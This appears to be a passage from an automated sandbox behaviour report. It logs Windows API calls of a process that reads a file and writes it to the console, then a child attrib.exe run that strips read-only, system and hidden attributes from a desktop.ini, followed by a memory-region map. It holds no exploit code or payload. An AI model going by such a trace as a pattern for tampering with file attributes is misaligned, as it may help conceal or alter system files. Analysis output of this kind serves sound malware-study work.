GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.569] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.569] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | 
out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] GetFileType (hFile=0x4c) returned 0x1 [0205.569] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.569] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, 
lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.570] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.570] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] GetFileType (hFile=0x4c) returned 0x1 [0205.570] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.570] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.571] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) 
returned 1 [0205.571] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.571] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] GetFileType (hFile=0x4c) returned 0x1 [0205.571] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.571] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.572] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.572] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.572] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.572] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, 
lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.573] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.573] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x200, lpOverlapped=0x0) returned 1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.573] GetFileType (hFile=0x4c) returned 0x1 [0205.573] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed58*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12eda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eda8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12edf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12edf8*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee48*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12ee98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ee98*, lpNumberOfBytesWritten=0x12deec*=0x50, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] WriteFile (in: hFile=0x4c, lpBuffer=0x12eee8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12eee8*, lpNumberOfBytesWritten=0x12deec*=0x20, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.574] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.574] ReadFile (in: hFile=0x54, lpBuffer=0x12ed08, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12def8, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesRead=0x12def8*=0x32, lpOverlapped=0x0) returned 1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.574] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.574] GetFileType (hFile=0x4c) returned 0x1 [0205.575] _get_osfhandle (_FileHandle=1) returned 0x4c [0205.575] WriteFile (in: hFile=0x4c, lpBuffer=0x12ed08*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x12deec, lpOverlapped=0x0 | out: lpBuffer=0x12ed08*, lpNumberOfBytesWritten=0x12deec*=0x32, lpOverlapped=0x0) returned 1 [0205.575] _get_osfhandle (_FileHandle=4) returned 0x54 [0205.575] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ded8 | out: lpNewFilePointer=0x0) returned 1 [0205.575] _close (_FileHandle=4) returned 0 [0205.575] FindNextFileW (in: hFindFile=0x240e80, lpFindFileData=0x12ef6c | out: lpFindFileData=0x12ef6c) returned 0 [0205.576] GetLastError () returned 0x12 [0205.576] FindClose (in: hFindFile=0x240e80 | out: hFindFile=0x240e80) returned 1 [0205.576] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0205.576] _close (_FileHandle=3) returned 0 [0205.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0205.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0205.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0205.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0205.577] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0205.577] SetConsoleInputExeNameW () returned 0x1 [0205.577] GetConsoleOutputCP () returned 0x1b5 [0205.577] 
GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0205.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.577] exit (_Code=0) Process: id = "496" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d40" os_pid = "0xefc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "494" os_parent_pid = "0x4d4" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30414 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30415 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30416 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30417 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30418 start_va = 0x9b0000 end_va = 0x9b6fff entry_point = 0x9b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30419 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 30420 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30421 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30422 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 30423 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30424 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30425 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30426 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 30427 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30428 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 30429 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30430 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 30431 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30432 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30433 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30434 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30438 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: 